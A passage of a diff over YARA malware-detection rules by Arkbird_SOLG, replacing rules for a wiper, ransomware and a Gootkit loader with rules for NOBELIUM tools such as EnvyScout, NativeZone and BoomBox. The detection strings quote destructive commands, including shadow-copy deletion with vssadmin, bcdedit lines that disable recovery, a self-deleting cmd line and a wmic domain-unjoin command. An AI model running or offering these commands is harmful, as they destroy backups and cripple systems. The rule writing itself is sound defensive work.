ff ff 89 75 d4 50 8d 45 d4 83 cb ff 50 ff 75 d0 e8 02 50 00 00 83 65 e8 00 8d 4d d8 33 c0 6a 07 5f 66 89 45 d8 8d 85 4c fb ff ff 50 89 7d ec e8 c6 6d ff ff 6a ff 68 f4 1b 45 00 8d 4d d8 c6 45 fc 01 e8 fd e8 ff ff 83 f8 ff 74 38 83 65 a8 00 33 c9 6a ff 50 8d 45 d8 66 89 4d 98 50 8d 4d 98 89 7d ac e8 3d df ff ff 83 7d ac 08 8d 45 98 0f 43 45 98 50 e8 bc 58 02 00 59 8d 4d 98 8b d8 e8 dd 69 ff ff 56 8d 85 54 fd ff ff 50 ff 15 f0 00 45 00 8b f8 8d 85 54 fd ff ff 50 8d 4d d8 e8 57 6d ff ff 8b 4d ec 8d 45 d8 8b 55 d8 83 f9 08 8b 75 e8 0f 43 c2 66 83 7c 70 fe 5c 75 16 83 f9 08 8d 45 d8 0f 43 c2 33 c9 66 89 4c 70 fe 8b 4d ec 8b 55 d8 83 f9 08 8d 45 d8 0f 43 c2 33 c9 51 51 6a 03 51 6a 03 51 50 ff 15 dc 00 45 00 8b f0 83 fe ff 74 7e 33 c9 8d 45 d4 51 50 68 04 01 00 00 8d 85 5c ff ff ff 50 51 51 68 00 00 56 00 56 ff 15 84 01 45 00 39 9d 64 ff ff ff 75 2c 8d 45 d4 50 68 04 01 00 00 8d 85 44 f9 ff ff 50 8d 85 54 fd ff ff 50 ff 15 08 01 45 00 8d 85 44 f9 ff ff 50 8d 4d b8 e8 b1 6c ff ff 56 ff 15 a8 00 45 00 68 04 01 00 00 8d 85 54 fd ff ff 50 57 ff 15 f8 00 45 00 85 c0 0f 85 29 ff ff ff 57 ff 15 fc 00 45 00 8b 75 08 33 c0 88 45 f0 8b ce ff 75 f0 89 46 10 89 46 14 8d 45 b8 50 e8 f3 4e ff ff 8d 4d d8 e8 cb 68 ff ff 8d 4d b8 e8 c3 68 ff ff 8b 4d f4 8b c6 5f 5e 5b 64 89 0d 00 00 00 00 c9 } + $seq2 = { 89 7d e4 e8 d5 a9 ff ff c7 04 24 88 02 00 00 6a 40 ff 15 28 01 45 00 8b f0 c7 45 d4 88 02 00 00 8d 45 d4 89 75 e8 50 56 e8 78 1b 00 00 83 f8 6f 75 17 56 ff 15 2c 01 45 00 ff 75 d4 6a 40 ff 15 28 01 45 00 8b f0 89 45 e8 8d 45 d4 50 56 e8 52 1b 00 00 85 c0 0f 84 } + $com1 = "bcdedit.exe / set{ default } bootstatuspolicy ignoreallfailures" fullword ascii + $com2 = { 63 6d 64 2e 65 78 65 00 20 26 20 00 2f 43 20 70 69 6e 67 20 31 2e 31 2e 31 2e 31 20 2d 6e 20 31 20 2d 77 20 33 30 30 30 20 3e 20 4e 75 6c 20 26 20 44 65 6c 20 2f 66 20 2f 71 20 22 25 73 22 } + $com3 = "bcdedit.exe / set{ default } recoveryenabled No" fullword ascii + $com4 = "vssadmin.exe Delete Shadows / All / Quiet" fullword ascii + $com5 = "schtasks /Create /SC MINUTE /TN " fullword ascii + $com6 = "schtasks /Delete /TN " fullword ascii + $str1 = { 47 45 54 20 25 73 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 25 73 } + $str2 = { 50 4f 53 54 20 25 73 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 25 73 } + $str3 = "Content-Type: application/x-www-form-urlencoded" fullword ascii condition: - uint16(0)==0x5A4D and filesize >25KB and all of ($s*) + uint16(0)==0x5a4d and filesize >200KB and all of ($seq*) and 4 of ($com*) and 2 of ($str*) } -rule ARKBIRD_SOLG_MAL_Unknown_PE_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Envyscout_May_2021_1 : FILE { meta: - description = "Detect unknown TA that focus russian people" + description = "Detect EnvyScout downloader" author = "Arkbird_SOLG" - id = "228e194c-84d9-562a-8811-326c5efeafae" - date = "2020-07-14" - modified = "2021-07-14" - reference = "https://twitter.com/ShadowChasing1/status/1415292150258880513" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-14/MAL_Unknown_PE_Jul_2021_1.yara#L1-L19" + id = "645f60d1-7c95-515c-a88e-d8528cf8b644" + date = "2021-05-28" + modified = "2021-06-02" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_EnvyScout_May_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "9c61d2e29315bea0cdaf45b6dc48d35b8cc2d85de84afbb3a213f095a555af71" + logic_hash = "7ce4fd18c88f7ea7486c51fc0b673d178bd26ecc2f4a39ec9c5a4a71aaa0daa1" score = 75 quality = 73 tags = "FILE" - hash1 = "ef80365cdbeb46fa208e98ca2f73b7d3d2bde10ea6c3f7cc22d4bbf39d921524" - tlp = "white" - adversary = "-" + hash1 = "279d5ef8f80aba530aaac8afd049fa171704fc703d9cfe337b56639732e8ce11" + hash2 = "9059c5b46dce8595fcc46e63e4ffbceeed883b7b1c9a2313f7208a7f26a0c186" + tlp = "White" + adversary = "NOBELIUM" strings: - $s1 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 43 00 52 00 45 00 41 00 54 00 45 00 20 00 2f 00 53 00 43 00 20 00 4f 00 4e 00 43 00 45 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 54 00 52 00 20 00 25 00 73 00 20 00 2f 00 52 00 49 00 20 00 31 00 20 00 2f 00 53 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 45 00 54 00 20 00 25 00 30 00 32 00 64 00 3a 00 25 00 30 00 32 00 64 00 20 00 2f 00 46 } - $s2 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 45 00 6e 00 64 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 } - $s3 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 54 00 4e 00 20 00 25 00 73 00 20 00 2f 00 46 00 20 00 3c 00 20 00 25 00 73 } - $s4 = "6ad5e187ae3e8911c420434551678df2.txt" fullword wide - $s5 = { 55 52 4c 44 6f 77 6e 6c 6f 61 64 65 72 } - $s6 = { 64 6c 6c 00 4d 79 45 78 70 6f 72 74 } + $s1 = "==typeof window&&window.window===window?window:" fullword ascii + $s2 = "==typeof self&&self.self===self?self:" fullword ascii + $s3 = "0===t?t={autoBom:!1}:" fullword ascii + $s4 = "_global.saveAs=saveAs.saveAs=saveAs" fullword ascii + $s5 = "navigator.userAgent" fullword ascii + $s6 = { 6e 65 77 20 42 6c 6f 62 28 5b [1-12] 5d 2c 20 7b 74 79 70 65 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 7d 29 3b 73 61 76 65 41 73 28 } condition: - uint16(0)==0x5a4d and filesize >8KB and 5 of ($s*) + filesize >100KB and 5 of ($s*) } -rule ARKBIRD_SOLG_WIP_Meteorexpress_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Enc_Payload_May_2021_1 : FILE { meta: - description = "Detect MeteorExpress/BreakWin wiper" + description = "Detect encrypted payload, must be with others APT29 rules maybe give lot fake postives due to the pdf header" author = "Arkbird_SOLG" - id = "6dffc8c9-ccd0-5cf3-8f3c-38adad8508b2" - date = "2021-08-06" - modified = "2021-08-07" - reference = "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-07/BreakWin/WIP_MeteorExpress_Aug_2021_1.yara#L1-L26" + id = "34da1d06-7892-59ec-8b11-c3278a7f2e34" + date = "2021-05-28" + modified = "2021-06-02" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_Enc_payload_May_2021_1.yara#L1-L17" license_url = "N/A" - logic_hash = "80e40479d699b988d1282e407edd51b5e3ea796ebf380d82f5a5aafaacafe75d" - score = 75 - quality = 71 + logic_hash = "484d9947d8acd32126cdc3e3f671cd3b3b048bbdb608d5573f6fcc7e4ddf13f8" + score = 50 + quality = 75 tags = "FILE" - hash1 = "2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b" - hash2 = "074bcc51b77d8e35b96ed444dc479b2878bf61bf7b07e4d7bd4cf136cc3c0dce" - hash3 = "6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4" - hash4 = "9b0f724459637cec5e9576c8332bca16abda6ac3fbbde6f7956bc3a97a423473" - tlp = "white" - adversary = "-" + hash1 = "23e20d630a8fd12600c2811d8f179f0e408dcb3e82600456db74cbf93a66e70f" + hash2 = "656384c4e5f9fe435d51edf910e7ba28b5c6d183587cf3e8f75fb2d798a01eeb" + level = "Experimental" + tlp = "White" + adversary = "NOBELIUM" strings: - $s1 = { 8d 04 2a 8b f1 3b c8 0f 42 f0 33 c9 8b c6 83 c0 01 0f 92 c1 f7 d9 0b c8 e8 42 00 00 00 53 68 18 2c 41 00 50 89 44 24 1c 89 5f 10 89 77 14 e8 aa 20 00 00 8b 74 24 1c 83 c4 0c c6 04 1e 00 83 fd 10 72 0a 8b 0f 8d 55 01 e8 50 00 00 00 5d 89 37 8b c7 5f 5e 5b 59 } - $s2 = { 68 cc 00 00 00 b8 [3] 00 e8 [2] 00 00 8b f1 89 75 8c 83 4d d4 ff 33 c0 83 4d d8 ff 6a 44 5f 57 50 89 45 dc 89 45 e0 8d 45 90 50 e8 [3] 00 8d 46 1c 89 7d 90 83 c4 0c 83 78 14 08 72 02 8b 00 89 45 98 8d 7d e4 33 c0 83 c6 04 ab 8b ce 83 7e 14 08 ab ab 72 02 8b 0e 8b 46 10 8d 04 41 8b ce 72 02 8b 0e ff 75 8c 33 d2 50 51 8d 4d e4 89 55 e4 89 55 e8 89 55 ec e8 [2] fd ff 33 d2 89 55 fc 8b 45 e8 89 55 88 39 45 ec 74 0d 33 c9 66 89 08 83 c0 02 89 45 e8 eb 0f 8d 4d 88 51 50 8d 4d e4 e8 3c 02 00 00 33 d2 8b 7d 8c 8d 4d d4 51 8d 4d 90 51 8b 47 34 52 52 52 52 52 52 ff 75 e4 52 ff 70 04 ff 15 08 [2] 00 85 c0 74 28 ff 75 d8 8d 4f 3c e8 [2] ff ff ff 75 d4 8d } - $s3 = { 8b ec 83 e4 f8 83 ec 7c a1 14 50 41 00 33 c4 89 44 24 78 8b 45 0c 8b 4d 08 89 0c 24 53 56 57 83 e8 01 0f 84 05 01 00 00 83 e8 01 0f 84 23 01 00 00 83 e8 0d 74 15 ff 75 14 ff 75 10 ff 75 0c 51 ff 15 2c e1 40 00 e9 0b 01 00 00 8d 44 24 40 c6 05 f4 63 41 00 01 50 51 ff 15 30 e1 40 00 8b d8 6a 00 89 5c 24 18 ff 15 10 e0 40 00 8b f0 8d 44 24 48 56 50 53 ff 15 28 e1 40 00 56 ff 15 0c e0 40 00 83 3d f8 63 41 00 00 0f 84 8d 00 00 00 53 ff 15 04 e0 40 00 ff 35 f8 63 41 00 89 44 24 14 50 ff 15 00 e0 40 00 8b d8 8d 44 24 18 50 6a 18 ff 35 f8 63 41 00 ff 15 14 e0 40 00 8b 7c 24 20 8d 44 24 30 8b 74 24 1c 50 ff 74 24 10 ff 15 44 e1 40 00 8b 44 24 38 2b c6 8b 74 24 10 68 20 00 cc 00 99 2b c2 6a 00 8b c8 8b 44 24 44 6a 00 56 ff 74 24 30 2b c7 d1 f9 ff 74 24 30 99 2b c2 d1 f8 50 51 ff 74 24 34 ff 15 18 e0 40 00 53 56 ff 15 00 e0 40 00 56 ff 15 08 e0 40 00 8d 44 24 40 } - $s4 = { 38 1b 38 26 38 2e 38 39 38 3f 38 4a 38 50 38 5e 38 67 38 6c 38 79 38 7e 38 ec 38 } - $s5 = { 55 8b ec 51 a1 60 57 41 00 83 f8 fe 75 0a e8 8e 0d 00 00 a1 60 57 41 00 83 f8 ff 75 07 b8 ff ff 00 00 eb 1b 6a 00 8d 4d fc 51 6a 01 8d 4d 08 51 50 ff 15 50 e0 40 00 85 c0 74 e2 66 8b 45 08 8b } - $s6 = { 69 63 61 63 6c 73 2e 65 78 65 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 53 79 73 74 65 6d 44 61 74 61 5c 53 2d 31 2d 35 2d 31 38 5c 52 65 61 64 4f 6e 6c 79 22 20 2f 72 65 73 65 74 20 2f 54 } - $s7 = { 77 6d 69 63 20 63 6f 6d 70 75 74 65 72 73 79 73 74 65 6d 20 77 68 65 72 65 20 6e 61 6d 65 3d 22 25 63 6f 6d 70 75 74 65 72 6e 61 6d 65 25 22 20 63 61 6c 6c 20 75 6e 6a 6f 69 6e 64 6f 6d 61 69 6e 6f 72 77 6f 72 6b 67 72 6f 75 70 } - $s8 = { 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 } - $s9 = { 8b 55 ?? 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 08 ff 15 ?? ?? 47 00 8b d0 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 09 8d 45 ?? 50 8d 45 ?? 50 8d 4d ?? e8 ?? ?? ?? ff 83 ec 0c 8b cc 89 65 ?? 51 ff 70 04 ff 30 e8 ?? ?? ?? ff c6 45 fc 0a 83 ec 18 8b cc 89 65 ?? 68 ?? ?? 48 00 e8 ?? ?? ?? ff c6 45 fc 0b c6 45 fc 09 8d } + $s1 = { 25 50 44 46 2d 31 2e 33 0a 25 06 8b c4 1c c5 86 66 f3 dc 75 f9 3b dd 8c 44 e3 d3 a4 74 9d 94 4e 2e 0f d9 01 a6 f2 88 6a a8 0b 16 1b 1a fc 60 3f 72 7a 1b c1 a7 bb 2f 19 31 6d 6f 79 db 20 f6 c7 fa e7 eb b9 88 77 de 1f a1 92 d7 ea 68 a9 b7 89 17 92 e8 b2 bb a5 58 56 b4 30 60 f8 28 0c 54 7b 2b 68 ba 7e 01 01 6d ad 2e 6d 72 67 1e b0 a8 ea 42 82 bd 14 9a 86 f0 0d 9a 8b 92 76 b3 b3 7d ef 69 24 2c 9f c2 ca e9 c9 b3 } + $s2 = { 25 25 45 4f 46 0a } condition: - uint16(0)==0x5A4D and filesize >25KB and 4 of ($s*) + filesize >50KB and all of ($s*) } -rule ARKBIRD_SOLG_Ran_Mount_Locker_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_MAL_Nativezone_May_2021_1 : FILE { meta: - description = "Detect Mount Locker ransomware (November 2020 variant)" + description = "Detect NativeZone malware" author = "Arkbird_SOLG" - id = "20fde6f4-ef7d-57c4-8cc2-a6ea810c2b0c" - date = "2020-11-20" - modified = "2020-11-22" + id = "5b858a8d-6e6a-5712-a83a-229bed1c7872" + date = "2021-05-28" + modified = "2021-06-05" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Mount Locker/Ran_Mount_Locker_Nov_2020_1.yar#L1-L26" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_NativeZone_May_2021_1.yara#L1-L17" license_url = "N/A" - logic_hash = "028e89e9c0c46ac5c36fee5cbfba068b4c6c1f53aa224e454ebd358f2c6ae9a9" + logic_hash = "9281784100e922fe3ef64e7c112276ffa5f8691ab4f24f1b68fbb0495e449bd3" score = 75 quality = 75 tags = "FILE" - hash1 = "e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037" - hash2 = "226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2" + hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d" + hash2 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4" + tlp = "White" + adversary = "NOBELIUM" strings: - $s1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword wide - $s2 = "VBA6.DLL" fullword ascii - $s3 = "MSComDlg.CommonDialog" fullword ascii - $s4 = "DllFunctionCall" fullword ascii - $s5 = { 00 2a 00 5c 00 41 00 43 00 3a 00 5c [35-160] 00 2e 00 76 00 62 00 70 } - $s6 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\COMCTL32.oca" fullword wide - $s7 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\MSFLXGRD.oca" fullword ascii - $s8 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii - $s9 = "SFLXGRD.OCX" fullword ascii - $s10 = "COMDLG32.OCX" fullword ascii - $s11 = "COMCTL32.OCX" fullword ascii - $seq1 = { 42 00 24 00 40 00 43 00 67 00 2f 00 44 00 08 00 4a 00 51 00 77 00 54 00 76 00 25 00 55 00 48 00 00 00 00 00 5d 00 4c 00 09 00 53 00 3e 00 73 00 62 00 52 00 50 00 0b 00 61 00 01 00 61 01 3a 00 03 00 57 00 4f 00 75 00 54 00 71 00 22 00 53 00 37 00 00 00 30 00 1d 00 46 00 5a 00 5c 00 48 00 78 00 63 00 02 00 1d 00 23 00 3b 00 28 00 55 00 73 00 28 00 61 00 3b 00 00 00 00 00 44 00 4e 00 4a 00 4d 00 61 00 40 00 59 00 2b 00 38 00 02 01 04 01 54 00 08 00 52 00 56 00 1d 00 42 00 3e 00 00 00 00 00 35 00 70 00 3b 00 37 00 6f 00 26 00 26 00 40 00 64 00 02 00 51 00 3c 00 41 00 16 00 3e 00 00 00 47 00 58 00 33 00 89 00 54 00 2d 00 29 00 50 00 04 00 59 00 5d 00 4f 00 1b 00 36 00 30 00 83 00 41 00 00 00 2a 00 54 00 47 00 86 00 56 00 19 00 24 00 4e 00 3a 00 45 00 51 00 4d 00 1e 00 3b 00 2b 00 81 00 35 00 00 00 3a 00 65 00 57 00 03 00 2d 00 62 00 53 } - $seq2 = { 5a 00 3d 00 14 00 51 00 1f 00 67 00 1c 00 24 00 00 00 00 00 00 00 6f 00 27 00 62 00 5d 00 6d 00 30 00 01 00 27 01 25 00 62 00 7b 00 05 00 56 00 24 00 3c 00 3d 00 5d 00 2e 00 62 00 03 00 0a 00 57 00 6a 00 02 00 5d 00 02 01 23 01 67 00 20 00 54 00 01 00 6c 01 17 00 0b 00 44 00 21 00 1e 00 01 00 52 01 60 00 3b 00 11 00 45 00 2a 00 59 00 2c 00 19 00 00 00 5a 00 1e 00 61 00 5c 00 6b 00 31 00 01 00 1a 01 2d 00 4a 00 6f 00 11 00 57 00 2c 00 3a 00 3a 00 50 00 2a 00 61 00 02 00 07 00 53 00 7b 00 01 01 5b 00 02 01 6a 01 0b 00 03 00 6d 00 43 00 0c 00 64 00 4d 00 44 00 5f 00 08 00 5a 00 68 00 2b 00 32 00 68 } + $s1 = { 8b ff 55 8b ec 81 ec 1c 01 00 00 a1 00 ?? 01 10 33 c5 89 45 fc 8b 4d 0c 53 8b 5d 14 56 8b 75 08 89 b5 fc fe ff ff 89 9d f8 fe ff ff 57 8b 7d 10 89 bd 00 ff ff ff 85 f6 75 25 85 c9 74 21 e8 [2] ff ff c7 00 16 00 00 00 e8 [2] ff ff 8b 4d fc 5f 5e 33 cd 5b e8 [2] ff ff 8b e5 5d c3 85 ff 74 db 85 db 74 d7 c7 85 f4 fe ff ff 00 00 00 00 83 f9 02 72 d8 49 0f af cf 03 ce 89 8d 04 ff ff ff 8b c1 33 d2 2b c6 f7 f7 8d 78 01 83 ff 08 0f 87 dc 00 00 00 8b bd 00 ff ff ff 3b ce 0f 86 a1 00 00 00 8d 14 37 89 95 ec fe ff ff 8d 49 00 8b c6 8b f2 89 85 08 ff ff ff 3b f1 77 31 8b ff 50 56 8b cb ff 15 [2] ?? 10 ff d3 83 c4 08 85 c0 7e 0a 8b c6 89 85 08 ff ff ff eb 06 8b 85 08 ff ff ff 8b 8d 04 ff ff ff 03 f7 3b f1 76 d1 8b d1 3b c1 74 34 2b c1 8b df 89 85 08 ff ff ff 90 8a 0c 10 8d 52 01 8b b5 08 ff ff ff 8a 42 ff 88 44 16 ff 8b c6 88 4a ff 83 eb 01 75 e3 8b 9d f8 fe ff ff 8b 8d 04 ff ff ff 8b b5 fc fe ff ff 2b cf 8b 95 ec fe ff ff 89 8d 04 ff ff ff 3b } + $s2 = { 8b b5 00 ff ff ff 8b cb 8b 85 fc fe ff ff d1 ef 0f af fe 03 f8 57 50 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 57 ff b5 fc fe ff ff e8 1b fe ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb ff b5 fc fe ff ff ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 15 56 ff b5 04 ff ff ff ff b5 fc fe ff ff e8 e9 fd ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb 57 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 ff b5 04 ff ff ff 57 e8 c1 fd ff ff 83 c4 0c 8b 85 04 ff ff ff 8b d8 8b b5 fc fe ff ff 8b 95 00 ff ff ff 89 85 08 ff ff ff 8d 64 24 00 3b fe 76 37 03 f2 89 b5 f0 fe ff ff 3b f7 73 25 8b 8d f8 fe ff ff 57 56 ff 15 [3] 10 ff 95 f8 fe ff ff 8b 95 00 ff ff ff 83 c4 08 85 c0 7e d3 3b fe 77 3d 8b 85 04 ff ff ff 8b 9d f8 fe ff ff 03 f2 3b f0 77 1f 57 56 8b cb ff 15 [3] 10 ff d3 8b 95 00 ff ff ff 83 c4 08 85 c0 8b 85 04 ff ff ff 7e db 8b 9d 08 ff ff ff 89 b5 f0 fe ff ff 8b b5 f8 fe ff ff eb 06 8d 9b 00 00 00 00 8b 95 00 ff ff ff 8b c3 2b da 89 85 08 ff ff ff 3b df 76 1f 57 53 8b ce ff 15 [3] 10 ff d6 83 c4 08 85 c0 7f d9 8b 95 00 ff ff ff 8b 85 08 ff ff ff 8b b5 f0 fe ff ff 89 9d 08 ff ff ff } + $s3 = { 8b 45 f4 89 7d f8 8d 04 86 8b c8 89 45 e8 8b c7 89 4d f4 3b 45 dc 74 5b 8b d6 2b d7 89 55 e4 8b 00 8b d0 89 45 ec 8d 42 01 89 45 f0 8a 02 42 84 c0 75 f9 2b 55 f0 8d 42 01 50 ff 75 ec 89 45 f0 8b 45 e8 2b c1 03 45 fc 50 51 e8 [2] 00 00 83 c4 10 85 c0 75 72 8b 45 f8 8b 55 e4 8b 4d f4 89 0c 02 83 c0 04 03 4d f0 89 4d f4 89 45 f8 3b 45 dc 75 ac 8b 45 0c 89 5d f8 89 30 8b f3 53 e8 [2] ff ff 59 8b 45 dc 8b d7 2b c2 89 55 e4 83 c0 03 c1 e8 02 39 55 dc 1b c9 f7 d1 23 c8 89 4d e8 74 18 8b f1 ff 37 e8 [2] ff ff 43 8d 7f 04 59 3b } condition: - uint16(0)==0x5a4d and filesize >100KB and 6 of ($s*) and 1 of ($seq*) + uint16(0)==0x5a4d and filesize >50KB and all of ($s*) } -rule ARKBIRD_SOLG_Loa_JS_Gootkit_Nov_2020_1 : FILE +rule ARKBIRD_SOLG_MAL_Boombox_May_2021_1 : FILE { meta: - description = "Detect JS loader used on the Gootkit killchain (November 2020)" + description = "Detect BoomBox malware" author = "Arkbird_SOLG" - id = "649133bd-a44c-5d99-befa-0508fed27ed8" - date = "2020-11-21" - modified = "2020-11-21" - reference = "https://twitter.com/ffforward/status/1330214661577437187" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Gootkit/Loa_JS_Gootkit_Nov_2020_1.yar#L1-L16" + id = "b2629c5b-1fb0-5ea1-8661-faf8f1d6b578" + date = "2021-05-28" + modified = "2021-06-05" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_BoomBox_May_2021_1.yara#L1-L18" license_url = "N/A" - logic_hash = "f24d31e7107b8c59b969481596a5e1369933bf2b0fa5117cd1aa5f7ea116d8d5" + logic_hash = "b88848ead9c992392c99e88a25541b72d825fbd32c3eb83fefc18e7cfbd08cc8" score = 75 quality = 75 tags = "FILE" - hash1 = "7aec3ed791529182c0f64ce34415c3c705a79f3d628cbcff70c34a9f73d8ff42" + hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec" + hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27" + tlp = "White" + adversary = "NOBELIUM" strings: - $s1 = { 7b [4-6] 5b [4-6] 5d 28 [4-6] 5b [4-6] 5d 29 28 [4-6] 5b [4-6] 5d 29 3b 7d } - $s2 = { 7b 72 65 74 75 72 6e 20 [4-6] 20 25 20 28 [4-6] 2b [4-6] 29 3b 7d } - $s3 = { 7b [4-6] 20 3d 20 [4-6] 28 [4-6] 29 2e 73 70 6c 69 74 28 [4-6] 29 3b 7d } - $s4 = { 7b 72 65 74 75 72 6e 20 [4-6] 2e 63 68 61 72 41 74 28 [4-6] 29 3b 7d} - $s5 = { 7b [4-6] 5b [4-6] 5d 20 3d 20 [4-6] 5b [4-6] 5b [4-6] 5d 5d 3b 7d } + $s1 = { 13 30 06 00 90 01 00 00 07 00 00 11 1f 1a 28 53 00 00 0a 25 72 bc 05 00 70 28 1e 00 00 0a 0a 06 28 54 00 00 0a 2d 07 06 28 55 00 00 0a 26 72 ea 05 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 22 07 28 55 00 00 0a 26 07 72 12 06 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 07 07 28 55 00 00 0a 26 73 08 00 00 06 25 7e 08 00 00 04 72 1c 06 00 70 6f 06 00 00 06 0c 08 2c 46 08 8e 69 1f 11 59 8d 2b 00 00 01 13 04 08 1f 0a 11 04 16 11 04 8e 69 28 56 00 00 0a 73 05 00 00 06 11 04 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 05 06 72 3c 06 00 70 28 1e 00 00 0a 11 05 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 46 7e 59 00 00 0a 72 64 06 00 70 17 6f 5a 00 00 0a 13 06 11 06 72 c0 06 00 70 6f 5b 00 00 0a 2d 26 11 06 72 c0 06 00 70 72 e8 06 00 70 06 72 3c 06 00 70 28 1e 00 00 0a 72 12 07 00 70 28 5c 00 00 0a 6f 5d 00 00 0a 7e 08 00 00 04 72 38 07 00 70 6f 06 00 00 06 0d 09 2c 46 09 8e 69 1f 11 59 8d 2b 00 00 01 13 07 09 1f 0a 11 07 16 11 07 8e 69 28 56 00 00 0a 73 05 00 00 06 11 07 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 08 07 72 58 07 00 70 28 1e 00 00 0a 11 08 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 16 72 84 07 00 70 06 72 9e 07 00 70 28 1e 00 00 0a 28 5e 00 00 0a 26 2a } + $s2 = { 13 30 05 00 11 01 00 00 05 00 00 11 02 7b 02 00 00 04 72 0b 03 00 70 28 1e 00 00 0a 28 30 00 00 0a 74 2d 00 00 01 25 20 c0 d4 01 00 6f 31 00 00 0a 25 72 86 01 00 70 6f 32 00 00 0a 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 8d 02 00 70 03 28 1e 00 00 0a 6f 36 00 00 0a 25 72 2b 03 00 70 6f 3f 00 00 0a 72 9d 02 00 70 04 72 5d 03 00 70 28 37 00 00 0a 0a 25 6f 35 00 00 0a 72 bb 02 00 70 06 6f 38 00 00 0a 25 6f 40 00 00 0a 05 16 05 8e 69 6f 2e 00 00 0a 6f 39 00 00 0a 74 1a 00 00 01 0b 07 6f 3a 00 00 0a 20 c8 00 00 00 33 64 07 6f 3e 00 00 0a 73 41 00 00 0a 6f 42 00 00 0a 0c 02 7b 06 00 00 04 08 6f 43 00 00 0a 6f 44 00 00 0a 17 6f 45 00 00 0a 6f 46 00 00 0a 72 02 04 00 70 28 47 00 00 0a 2c 29 02 7b 03 00 00 04 08 6f 43 00 00 0a 26 02 7b 04 00 00 04 08 6f 43 00 00 0a 26 02 7b 05 00 00 04 08 6f 43 00 00 0a 26 17 2a 16 2a 16 2a } + $s3 = { 13 30 04 00 6d 01 00 00 0a 00 00 11 72 f2 07 00 70 28 54 00 00 